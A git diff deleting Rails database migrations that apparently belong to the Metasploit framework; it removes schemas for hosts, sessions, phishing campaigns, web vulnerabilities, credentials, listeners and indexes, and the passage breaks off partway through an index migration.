--- a/data/sql/migrate/20100824151500_add_exploited_table.rb
+++ /dev/null
@@ -1,16 +0,0 @@
-class AddExploitedTable < ActiveRecord::Migration
- def self.up
- create_table :exploited_hosts do |t|
- t.integer :host_id, :null => false
- t.integer :service_id
- t.string :session_uuid, :limit => 8
- t.string :name, :limit => 2048
- t.string :payload, :limit => 2048
- t.timestamps
- end
- end
- def self.down
- drop_table :exploited_hosts
- end
-end
-
diff --git a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb b/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb
deleted file mode 100755
index c136d4b9d7..0000000000
--- a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb
+++ /dev/null
@@ -1,9 +0,0 @@
-class AddOwnerToWorkspaces < ActiveRecord::Migration
- def self.up
- add_column :workspaces, :owner_id, :integer
- end
-
- def self.down
- remove_column :workspaces, :owner_id
- end
-end
diff --git a/data/sql/migrate/20100911122000_add_report_templates.rb b/data/sql/migrate/20100911122000_add_report_templates.rb
deleted file mode 100755
index 08b06d4c5f..0000000000
--- a/data/sql/migrate/20100911122000_add_report_templates.rb
+++ /dev/null
@@ -1,18 +0,0 @@
-class AddReportTemplates < ActiveRecord::Migration
-
- def self.up
- create_table :report_templates do |t|
- t.integer :workspace_id, :null => false, :default => 1
- t.string :created_by
- t.string :path, :limit => 1024
- t.text :name
- t.timestamps
- end
- end
-
- def self.down
- drop_table :reports
- end
-
-end
-
diff --git a/data/sql/migrate/20100916151530_require_admin_flag.rb b/data/sql/migrate/20100916151530_require_admin_flag.rb
deleted file mode 100755
index d73e18425d..0000000000
--- a/data/sql/migrate/20100916151530_require_admin_flag.rb
+++ /dev/null
@@ -1,15 +0,0 @@
-class RequireAdminFlag < ActiveRecord::Migration
-
- # Make the admin flag required.
- def self.up
- # update any existing records
- Mdm::User.update_all({:admin => true}, {:admin => nil})
-
- change_column :users, :admin, :boolean, :null => false, :default => true
- end
-
- def self.down
- change_column :users, :admin, :boolean, :default => true
- end
-
-end
diff --git a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb b/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb
deleted file mode 100755
index 433bdcf65f..0000000000
--- a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb
+++ /dev/null
@@ -1,61 +0,0 @@
-
-class AddCampaignsAndTemplates < ActiveRecord::Migration
-
- def self.up
- create_table :campaigns do |t|
- t.integer :workspace_id, :null => false
- t.string :name, :limit => 512
- # Serialized, stores SMTP/other protocol config options etc.
- t.text :prefs
- t.integer :status, :default => 0
- t.timestamp :started_at
- t.timestamps
- end
-
- create_table :email_templates do |t|
- t.string :name, :limit => 512
- t.string :subject, :limit => 1024
- t.text :body
- t.integer :parent_id
- t.integer :campaign_id
- end
- create_table :attachments do |t|
- t.string :name, :limit => 512
- t.binary :data
- t.string :content_type, :limit => 512
- t.boolean :inline, :null => false, :default => true
- t.boolean :zip, :null => false, :default => false
- end
- create_table :attachments_email_templates, :id => false do |t|
- t.integer :attachment_id
- t.integer :email_template_id
- end
-
- create_table :email_addresses do |t|
- t.integer :campaign_id, :null => false
- t.string :first_name, :limit => 512
- t.string :last_name, :limit => 512
- t.string :address, :limit => 512
- t.boolean :sent, :null => false, :default => false
- t.timestamp :clicked_at
- end
-
- create_table :web_templates do |t|
- t.string :name, :limit => 512
- t.string :title, :limit => 512
- t.string :body, :limit => 524288
- t.integer :campaign_id
- end
- end
-
- def self.down
- drop_table :campaigns
- drop_table :email_templates
- drop_table :attachments
- drop_table :attachments_email_templates
- drop_table :email_addresses
- drop_table :web_templates
- end
-
-end
-
diff --git a/data/sql/migrate/20100920012100_add_generate_exe_column.rb b/data/sql/migrate/20100920012100_add_generate_exe_column.rb
deleted file mode 100755
index 7b055b268f..0000000000
--- a/data/sql/migrate/20100920012100_add_generate_exe_column.rb
+++ /dev/null
@@ -1,8 +0,0 @@
-class AddGenerateExeColumn < ActiveRecord::Migration
- def self.up
- add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false
- end
- def self.down
- remove_column :email_templates, :generate_exe
- end
-end
diff --git a/data/sql/migrate/20100926214000_add_template_prefs.rb b/data/sql/migrate/20100926214000_add_template_prefs.rb
deleted file mode 100755
index 70b84d0734..0000000000
--- a/data/sql/migrate/20100926214000_add_template_prefs.rb
+++ /dev/null
@@ -1,11 +0,0 @@
-class AddTemplatePrefs < ActiveRecord::Migration
- def self.up
- remove_column :email_templates, :generate_exe
- add_column :email_templates, :prefs, :text
- add_column :web_templates, :prefs, :text
- end
- def self.down
- remove_column :email_templates, :prefs
- remove_column :web_templates, :prefs
- end
-end
diff --git a/data/sql/migrate/20101001000000_add_web_tables.rb b/data/sql/migrate/20101001000000_add_web_tables.rb
deleted file mode 100755
index e55bf286b5..0000000000
--- a/data/sql/migrate/20101001000000_add_web_tables.rb
+++ /dev/null
@@ -1,57 +0,0 @@
-class AddWebTables < ActiveRecord::Migration
-
- def self.up
- create_table :web_sites do |t|
- t.integer :service_id, :null => false
- t.timestamps
- t.string :vhost, :limit => 2048
- t.text :comments
- t.text :options
- end
-
- create_table :web_pages do |t|
- t.integer :web_site_id, :null => false
- t.timestamps
- t.text :path
- t.text :query
- t.integer :code, :null => false
- t.text :cookie
- t.text :auth
- t.text :ctype
- t.timestamp :mtime
- t.text :location
- t.text :body
- t.text :headers
- end
-
- create_table :web_forms do |t|
- t.integer :web_site_id, :null => false
- t.timestamps
- t.text :path
- t.string :method, :limit => 1024
- t.text :params
- end
-
- create_table :web_vulns do |t|
- t.integer :web_site_id, :null => false
- t.timestamps
- t.text :path
- t.string :method, :limit => 1024
- t.text :params
- t.text :pname
- t.text :proof
- t.integer :risk
- t.string :name, :limit => 1024
- end
-
- end
-
- def self.down
- drop_table :web_sites
- drop_table :web_pages
- drop_table :web_forms
- drop_table :web_vulns
- end
-end
-
-
diff --git a/data/sql/migrate/20101002000000_add_query.rb b/data/sql/migrate/20101002000000_add_query.rb
deleted file mode 100755
index f22d0f2954..0000000000
--- a/data/sql/migrate/20101002000000_add_query.rb
+++ /dev/null
@@ -1,10 +0,0 @@
-class AddQuery < ActiveRecord::Migration
- def self.up
- add_column :web_forms, :query, :text
- add_column :web_vulns, :query, :text
- end
- def self.down
- remove_column :web_forms, :query
- remove_column :web_vulns, :query
- end
-end
diff --git a/data/sql/migrate/20101007000000_add_vuln_info.rb b/data/sql/migrate/20101007000000_add_vuln_info.rb
deleted file mode 100755
index 34c1eb3fd9..0000000000
--- a/data/sql/migrate/20101007000000_add_vuln_info.rb
+++ /dev/null
@@ -1,15 +0,0 @@
-class AddVulnInfo < ActiveRecord::Migration
- def self.up
- add_column :web_vulns, :category, :text
- add_column :web_vulns, :confidence, :text
- add_column :web_vulns, :description, :text
- add_column :web_vulns, :blame, :text
- end
- def self.down
- remove_column :web_forms, :category
- remove_column :web_vulns, :confidence
- remove_column :web_vulns, :description
- remove_column :web_vulns, :blame
- end
-end
-
diff --git a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb b/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb
deleted file mode 100755
index 6281f91343..0000000000
--- a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb
+++ /dev/null
@@ -1,10 +0,0 @@
-
-class AddClientsToCampaigns < ActiveRecord::Migration
- def self.up
- add_column :clients, :campaign_id, :integer
- end
-
- def self.down
- remove_column :clients, :campaign_id
- end
-end
diff --git a/data/sql/migrate/20101009023300_add_campaign_attachments.rb b/data/sql/migrate/20101009023300_add_campaign_attachments.rb
deleted file mode 100755
index 6baf770f29..0000000000
--- a/data/sql/migrate/20101009023300_add_campaign_attachments.rb
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
-class AddCampaignAttachments < ActiveRecord::Migration
-
- def self.up
- add_column :attachments, :campaign_id, :integer
- end
-
- def self.down
- remove_column :attachments, :campaign_id
- end
-
-end
-
-
diff --git a/data/sql/migrate/20101104135100_add_imported_creds.rb b/data/sql/migrate/20101104135100_add_imported_creds.rb
deleted file mode 100755
index 92eb12d474..0000000000
--- a/data/sql/migrate/20101104135100_add_imported_creds.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-class AddImportedCreds < ActiveRecord::Migration
-
- def self.up
- create_table :imported_creds do |t|
- t.integer :workspace_id, :null => false, :default => 1
- t.string :user, :limit => 512
- t.string :pass, :limit => 512
- t.string :ptype, :limit => 16, :default => "password"
- end
- end
-
- def self.down
- drop_table :imported_creds
- end
-
-end
-
diff --git a/data/sql/migrate/20101203000000_fix_web_tables.rb b/data/sql/migrate/20101203000000_fix_web_tables.rb
deleted file mode 100755
index 2056369ed7..0000000000
--- a/data/sql/migrate/20101203000000_fix_web_tables.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-class FixWebTables < ActiveRecord::Migration
-
- def self.up
- change_column :web_pages, :path, :text
- change_column :web_pages, :query, :text
- change_column :web_pages, :cookie, :text
- change_column :web_pages, :auth, :text
- change_column :web_pages, :ctype, :text
- change_column :web_pages, :location, :text
- change_column :web_pages, :path, :text
- change_column :web_vulns, :path, :text
- change_column :web_vulns, :pname, :text
-
- add_column :web_pages, :request, :text
- add_column :web_vulns, :request, :text
- end
-
- def self.down
- change_column :web_pages, :path, :text
- change_column :web_pages, :query, :text
- change_column :web_pages, :cookie, :text
- change_column :web_pages, :auth, :text
- change_column :web_pages, :ctype, :text
- change_column :web_pages, :location, :text
- change_column :web_pages, :path, :text
- change_column :web_vulns, :path, :text
- change_column :web_vulns, :pname, :text
-
- remove_column :web_pages, :request
- remove_column :web_vulns, :request
- end
-end
-
-
diff --git a/data/sql/migrate/20101203000001_expand_host_comment.rb b/data/sql/migrate/20101203000001_expand_host_comment.rb
deleted file mode 100755
index 1a0bc1bc51..0000000000
--- a/data/sql/migrate/20101203000001_expand_host_comment.rb
+++ /dev/null
@@ -1,12 +0,0 @@
-class ExpandHostComment < ActiveRecord::Migration
-
- def self.up
- change_column :hosts, :comments, :text
- end
-
- def self.down
- change_column :hosts, :comments, :string, :limit => 4096
- end
-end
-
-
diff --git a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
deleted file mode 100755
index 7365e14f9d..0000000000
--- a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
+++ /dev/null
@@ -1,9 +0,0 @@
-class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration
- def self.up
- add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false
- end
-
- def self.down
- remove_column :workspaces, :limit_to_network
- end
-end
diff --git a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb b/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb
deleted file mode 100755
index f41bc6a813..0000000000
--- a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb
+++ /dev/null
@@ -1,9 +0,0 @@
-class AddModuleUuidToTasks < ActiveRecord::Migration
- def self.up
- add_column :tasks, :module_uuid, :string, :limit => 8
- end
-
- def self.down
- remove_column :tasks, :module_uuid
- end
-end
diff --git a/data/sql/migrate/20110204112800_add_host_tags.rb b/data/sql/migrate/20110204112800_add_host_tags.rb
deleted file mode 100755
index d07c885c35..0000000000
--- a/data/sql/migrate/20110204112800_add_host_tags.rb
+++ /dev/null
@@ -1,28 +0,0 @@
-class AddHostTags < ActiveRecord::Migration
-
- def self.up
-
- create_table :tags do |t|
- t.integer :user_id
- t.string :name, :limit => 1024
- t.text :desc
- t.boolean :report_summary, :null => false, :default => false
- t.boolean :report_detail, :null => false, :default => false
- t.boolean :critical, :null => false, :default => false
- t.timestamps
- end
-
- create_table :hosts_tags, :id => false do |t|
- t.integer :host_id
- t.integer :tag_id
- end
-
- end
-
- def self.down
- drop_table :hosts_tags
- drop_table :tags
- end
-
-end
-
diff --git a/data/sql/migrate/20110317144932_add_session_table.rb b/data/sql/migrate/20110317144932_add_session_table.rb
deleted file mode 100755
index 15ac8852bb..0000000000
--- a/data/sql/migrate/20110317144932_add_session_table.rb
+++ /dev/null
@@ -1,110 +0,0 @@
-class AddSessionTable < ActiveRecord::Migration
-
- class Event < ActiveRecord::Base
- serialize :info
- end
-
- class SessionEvent < ActiveRecord::Base
- belongs_to :session
- end
-
- class Session < ActiveRecord::Base
- has_many :events, :class_name => 'AddSessionTable::SessionEvent'
- serialize :datastore
- end
-
- def self.up
-
- create_table :sessions do |t|
- t.integer :host_id
-
- t.string :stype # session type: meterpreter, shell, etc
- t.string :via_exploit # module name
- t.string :via_payload # payload name
- t.string :desc # session description
- t.integer :port
- t.string :platform # platform type of the remote system
- t.string :routes
-
- t.text :datastore # module's datastore
-
- t.timestamp :opened_at, :null => false
- t.timestamp :closed_at
-
- t.string :close_reason
- end
-
- create_table :session_events do |t|
- t.integer :session_id
-
- t.string :etype # event type: command, output, upload, download, filedelete
- t.binary :command
- t.binary :output
- t.string :remote_path
- t.string :local_path
-
- t.timestamp :created_at
- end
-
- #
- # Migrate session data from events table
- #
-
- close_events = Event.find_all_by_name("session_close")
- open_events = Event.find_all_by_name("session_open")
-
- command_events = Event.find_all_by_name("session_command")
- output_events = Event.find_all_by_name("session_output")
- upload_events = Event.find_all_by_name("session_upload")
- download_events = Event.find_all_by_name("session_download")
-
- open_events.each do |o|
- c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] }
-
- s = Session.new(
- :host_id => o.host_id,
- :stype => o.info[:session_type],
- :via_exploit => o.info[:via_exploit],
- :via_payload => o.info[:via_payload],
- :datastore => o.info[:datastore],
- :opened_at => o.created_at
- )
-
- if c
- s.closed_at = c.created_at
- s.desc = c.info[:session_info]
- else
- # couldn't find the corresponding close event
- s.closed_at = s.opened_at
- s.desc = "?"
- end
-
- uuid = o.info[:session_uuid]
-
- command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
- s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] )
- end
-
- output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
- s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] )
- end
-
- upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
- s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
- end
-
- download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
- s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
- end
-
- s.events.sort_by(&:created_at)
-
- s.save!
- end
- end
-
- def self.down
- drop_table :sessions
- drop_table :session_events
- end
-end
diff --git a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb b/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb
deleted file mode 100755
index 7c0e57c505..0000000000
--- a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb
+++ /dev/null
@@ -1,11 +0,0 @@
-class AddLocalIdToSessionTable < ActiveRecord::Migration
-
- def self.up
- add_column :sessions, :local_id, :integer
- end
-
- def self.down
- remove_column :sessions, :local_id
- end
-
-end
diff --git a/data/sql/migrate/20110415175705_add_routes_table.rb b/data/sql/migrate/20110415175705_add_routes_table.rb
deleted file mode 100755
index 1eb104f9bf..0000000000
--- a/data/sql/migrate/20110415175705_add_routes_table.rb
+++ /dev/null
@@ -1,18 +0,0 @@
-class AddRoutesTable < ActiveRecord::Migration
-
- def self.up
- create_table :routes do |t|
- t.integer :session_id
- t.string :subnet
- t.string :netmask
- end
-
- remove_column :sessions, :routes
- end
-
- def self.down
- drop_table :routes
-
- add_column :sessions, :routes, :string
- end
-end
diff --git a/data/sql/migrate/20110422000000_convert_binary.rb b/data/sql/migrate/20110422000000_convert_binary.rb
deleted file mode 100755
index 4fa3428ad1..0000000000
--- a/data/sql/migrate/20110422000000_convert_binary.rb
+++ /dev/null
@@ -1,72 +0,0 @@
-class ConvertBinary < ActiveRecord::Migration
-
-
- class WebPage < ActiveRecord::Base
- serialize :headers
- end
-
- class WebVuln < ActiveRecord::Base
- serialize :params
- end
-
- def bfilter(str)
- str = str.to_s
- str.encoding = 'binary' if str.respond_to?('encoding=')
- str.gsub(/[\x00\x7f-\xff]/, '')
- end
-
- def self.up
- rename_column :web_pages, :body, :body_text
- rename_column :web_pages, :request, :request_text
- rename_column :web_vulns, :request, :request_text
- rename_column :web_vulns, :proof, :proof_text
-
- add_column :web_pages, :body, :binary
- add_column :web_pages, :request, :binary
- add_column :web_vulns, :request, :binary
- add_column :web_vulns, :proof, :binary
-
- WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
- WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
- WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
- WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
-
- remove_column :web_pages, :body_text
- remove_column :web_pages, :request_text
- remove_column :web_vulns, :request_text
- remove_column :web_vulns, :proof_text
-
- WebPage.connection.schema_cache.clear!
- WebPage.reset_column_information
- WebVuln.connection.schema_cache.clear!
- WebVuln.reset_column_information
- end
-
- def self.down
-
- rename_column :web_pages, :body, :body_binary
- rename_column :web_pages, :request, :request_binary
- rename_column :web_vulns, :request, :request_binary
- rename_column :web_vulns, :proof, :proof_binary
-
- add_column :web_pages, :body, :text
- add_column :web_pages, :request, :text
- add_column :web_vulns, :request, :text
- add_column :web_vulns, :proof, :text
-
- WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
- WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
- WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
- WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
-
- remove_column :web_pages, :body_binary
- remove_column :web_pages, :request_binary
- remove_column :web_vulns, :request_binary
- remove_column :web_vulns, :proof_binary
-
- WebPage.connection.schema_cache.clear!
- WebPage.reset_column_information
- WebVuln.connection.schema_cache.clear!
- WebVuln.reset_column_information
- end
-end
diff --git a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb b/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb
deleted file mode 100755
index 48380af6ae..0000000000
--- a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb
+++ /dev/null
@@ -1,8 +0,0 @@
-class AddLastSeenToSessions < ActiveRecord::Migration
- def self.up
- add_column :sessions, :last_seen, :timestamp
- end
- def self.down
- remove_column :sessions, :last_seen
- end
-end
diff --git a/data/sql/migrate/20110513143900_track_successful_exploits.rb b/data/sql/migrate/20110513143900_track_successful_exploits.rb
deleted file mode 100755
index 7c55105fe8..0000000000
--- a/data/sql/migrate/20110513143900_track_successful_exploits.rb
+++ /dev/null
@@ -1,31 +0,0 @@
-class TrackSuccessfulExploits < ActiveRecord::Migration
-
-
- class ExploitedHost < ActiveRecord::Base
- end
-
- class Vuln < ActiveRecord::Base
- end
-
- def self.up
- add_column :vulns, :exploited_at, :timestamp
-
- # Migrate existing exploited_hosts entries
-
- ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host|
- next unless(exploited_host.name =~ /^(exploit|auxiliary)\//)
- vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id)
- next if vulns.empty?
- vulns.each do |vuln|
- vuln.exploited_at = exploited_host.updated_at
- vuln.save
- end
- end
-
- end
-
- def self.down
- remove_column :vulns, :exploited_at
- end
-
-end
diff --git a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
deleted file mode 100755
index e1b8955b7f..0000000000
--- a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
+++ /dev/null
@@ -1,26 +0,0 @@
-class RenameAndPruneNessusVulns < ActiveRecord::Migration
-
- class Vuln < ActiveRecord::Base
- end
-
- # No table changes, just vuln renaming to drop the NSS id
- # from those vulns that have it and a descriptive name.
- def self.up
- Vuln.find(:all).each do |v|
- if v.name =~ /^NSS-0?\s*$/
- v.delete
- next
- end
- next unless(v.name =~ /^NSS-[0-9]+\s(.+)/)
- new_name = $1
- next if(new_name.nil? || new_name.strip.empty?)
- v.name = new_name
- v.save!
- end
- end
-
- def self.down
- say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800."
- end
-
-end
diff --git a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb b/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb
deleted file mode 100755
index 5af2d46704..0000000000
--- a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb
+++ /dev/null
@@ -1,11 +0,0 @@
-class AddTaskIdToReportsTable < ActiveRecord::Migration
-
- def self.up
- add_column :reports, :task_id, :integer
- end
-
- def self.down
- remove_column :reports, :task_id
- end
-
-end
diff --git a/data/sql/migrate/20110527000001_add_api_keys_table.rb b/data/sql/migrate/20110527000001_add_api_keys_table.rb
deleted file mode 100755
index 13e6ecedd0..0000000000
--- a/data/sql/migrate/20110527000001_add_api_keys_table.rb
+++ /dev/null
@@ -1,12 +0,0 @@
-class AddApiKeysTable < ActiveRecord::Migration
- def self.up
- create_table :api_keys do |t|
- t.text :token
- t.timestamps
- end
- end
- def self.down
- drop_table :api_keys
- end
-end
-
diff --git a/data/sql/migrate/20110606000001_add_macros_table.rb b/data/sql/migrate/20110606000001_add_macros_table.rb
deleted file mode 100755
index bfb8ef6085..0000000000
--- a/data/sql/migrate/20110606000001_add_macros_table.rb
+++ /dev/null
@@ -1,16 +0,0 @@
-class AddMacrosTable < ActiveRecord::Migration
- def self.up
- create_table :macros do |t|
- t.timestamps
- t.text :owner
- t.text :name
- t.text :description
- t.binary :actions
- t.binary :prefs
- end
- end
- def self.down
- drop_table :macros
- end
-end
-
diff --git a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb b/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb
deleted file mode 100755
index e057c2ca20..0000000000
--- a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb
+++ /dev/null
@@ -1,127 +0,0 @@ -class MoveOldImportedCredsToNewFiles < ActiveRecord::Migration - - class ImportedCred < ActiveRecord::Base - end - - class CredFile < ActiveRecord::Base - end - - class Workspace < ActiveRecord::Base - end - - class << self - - def find_or_create_cred_path - cred_files_dir = nil - msf_base = Msf::Config.install_root - pro_base = File.expand_path(File.join(msf_base, "..", "engine", "lib", "pro")) - if File.directory? pro_base - cred_files_dir = File.expand_path(File.join(msf_base, "..", "cred_files")) - FileUtils.mkdir_p(cred_files_dir) unless File.exists?(cred_files_dir) - if File.directory?(cred_files_dir) and File.writable?(cred_files_dir) - end - end - return cred_files_dir - end - - def find_all_imported_creds_by_workspace - valid_ptypes = ["smb_hash", "userpass", "password"] - valid_workspaces = Workspace.all.map {|w| w.id} - creds = {} - ImportedCred.all.each do |cred| - next unless cred.ptype - next unless valid_ptypes.include? cred.ptype - next unless cred.workspace_id - next unless valid_workspaces.include? cred.workspace_id - creds[cred.workspace_id] ||= [] - creds[cred.workspace_id] << cred - end - return creds - end - - def sort_creds_into_file_types(old_creds) - files = {} - old_creds.each do |wid,creds| - filedata = {} - creds.each do |cred| - filedata[cred.ptype] ||= [] - case cred.ptype - when "smb_hash", "userpass" - filedata[cred.ptype] << ("%s %s" % [cred.user,cred.pass]) - when "password" - filedata[cred.ptype] << cred.pass.to_s - end - files[wid] = filedata - end - end - return files - end - - def write_creds_to_files(old_creds,cred_path) - file_data_to_write = sort_creds_into_file_types(old_creds) - files_written = [] - file_data_to_write.each do |wid, fdata_hash| - fdata_hash.each do |ftype,cred_data| - next unless cred_data - next if cred_data.empty? 
- fname = File.join(cred_path,"creds_#{wid}_#{ftype}-#{Time.now.utc.to_i}.txt") - fdata = cred_data.join("\n") - fh = File.open(fname, "wb") - begin - fh.write fdata - fh.flush - ensure - fh.close - end - files_written << fname - end - end - return files_written - end - - def register_new_files(new_files) - successful_count = 0 - new_files.each do |fname| - next unless File.split(fname).last =~ /^creds_([0-9]+)_(userpass|password|smb_hash)\-[0-9]+\.txt$/ - wid = $1 - next unless Workspace.find(wid) - ftype = $2 - actual_ftype = case ftype - when "smb_hash", "userpass" - "userpass" # They're treated the same - when "password" - "pass" - end - next unless actual_ftype - say "Registering credential file '%s' for workspace %d as type '%s'" % [fname,wid,actual_ftype] - cred_file = CredFile.new - cred_file.workspace_id = wid - cred_file.created_by = "" - cred_file.path = fname - cred_file.name = "#{ftype}.txt" - cred_file.desc = "Migrated #{ftype} credentials" - cred_file.ftype = actual_ftype - if cred_file.save - successful_count += 1 - say "Successfully imported #{ftype} credentials for workspace #{wid}" - end - end - successful_count - end - - end - - def self.up - cred_path = find_or_create_cred_path - if cred_path - old_imported_creds = find_all_imported_creds_by_workspace - new_files = write_creds_to_files(old_imported_creds,cred_path) - successful_count = register_new_files(new_files) - end - end - - # Sorry, can't get the old data back. - def self.down - end - -end diff --git a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb b/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb deleted file mode 100755 index ee9ee21070..0000000000 --- a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddSettingsToTasksTable < ActiveRecord::Migration - - def self.up - add_column :tasks, :settings, :binary - end - - def self.down - remove_column :tasks, :settings - end - -end - 
diff --git a/data/sql/migrate/20110624000001_add_listeners_table.rb b/data/sql/migrate/20110624000001_add_listeners_table.rb deleted file mode 100755 index c541be2131..0000000000 --- a/data/sql/migrate/20110624000001_add_listeners_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddListenersTable < ActiveRecord::Migration - def self.up - create_table :listeners do |t| - t.timestamps - t.integer :workspace_id, :null => false, :default => 1 - t.integer :task_id - t.boolean :enabled, :default => true - t.text :owner - t.text :payload - t.text :address - t.integer :port - t.binary :options - end - end - def self.down - drop_table :listeners - end -end - diff --git a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb b/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb deleted file mode 100755 index 283d102105..0000000000 --- a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddMacroToListenersTable < ActiveRecord::Migration - - def self.up - add_column :listeners, :macro, :text - end - - def self.down - remove_column :listeners, :macro - end - -end - diff --git a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb b/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb deleted file mode 100755 index 037af40ae1..0000000000 --- a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddNexposeConsolesTable < ActiveRecord::Migration - def self.up - create_table :nexpose_consoles do |t| - t.timestamps - t.boolean :enabled, :default => true - t.text :owner - t.text :address - t.integer :port, :default => 3780 - t.text :username - t.text :password - t.text :status - t.text :version - t.text :cert - t.binary :cached_sites - end - end - def self.down - drop_table :nexpose_consoles - end -end - 
diff --git a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb deleted file mode 100755 index 9411724344..0000000000 --- a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddNameToNexposeConsolesTable < ActiveRecord::Migration - - def self.up - add_column :nexpose_consoles, :name, :text - end - - def self.down - remove_column :nexpose_consoles, :name - end - -end - diff --git a/data/sql/migrate/20110717000001_add_profiles_table.rb b/data/sql/migrate/20110717000001_add_profiles_table.rb deleted file mode 100755 index c0b8831bf1..0000000000 --- a/data/sql/migrate/20110717000001_add_profiles_table.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddProfilesTable < ActiveRecord::Migration - def self.up - create_table :profiles do |t| - t.timestamps - t.boolean :active, :default => true - t.text :name - t.text :owner - t.binary :settings - end - end - def self.down - drop_table :profiles - end -end - diff --git a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb b/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb deleted file mode 100755 index b5fce6fd8f..0000000000 --- a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandCredPtypeColumn < ActiveRecord::Migration - def self.up - change_column :creds, :ptype, :string, :limit => 256 - end - def self.down - change_column :creds, :ptype, :string, :limit => 16 - end -end - diff --git a/data/sql/migrate/20110730000001_add_initial_indexes.rb b/data/sql/migrate/20110730000001_add_initial_indexes.rb deleted file mode 100755 index 4085f64843..0000000000 --- a/data/sql/migrate/20110730000001_add_initial_indexes.rb +++ /dev/null 
@@ -1,85 +0,0 @@ -class AddInitialIndexes < ActiveRecord::Migration - def self.up - - - add_index :hosts, :address - add_index :hosts, :address6 - add_index :hosts, :name - add_index :hosts, :state - add_index :hosts, :os_name - add_index :hosts, :os_flavor - add_index :hosts, :purpose - - # Removed (conditionally dropped in the next migration) - # add_index :hosts, :comments - - add_index :services, :port - add_index :services, :proto - add_index :services, :state - add_index :services, :name - - # Removed (conditionally dropped in the next migration) - # add_index :services, :info - - add_index :notes, :ntype - - add_index :vulns, :name - - # Removed (conditionally dropped in the next migration) - # add_index :vulns, :info - - add_index :refs, :name - - add_index :web_sites, :vhost - add_index :web_sites, :comments - add_index :web_sites, :options - - add_index :web_pages, :path - add_index :web_pages, :query - - add_index :web_forms, :path - - add_index :web_vulns, :path - add_index :web_vulns, :method - add_index :web_vulns, :name - end - - def self.down - - remove_index :hosts, :address - remove_index :hosts, :address6 - remove_index :hosts, :name - remove_index :hosts, :state - remove_index :hosts, :os_name - remove_index :hosts, :os_flavor - remove_index :hosts, :purpose - remove_index :hosts, :comments - - 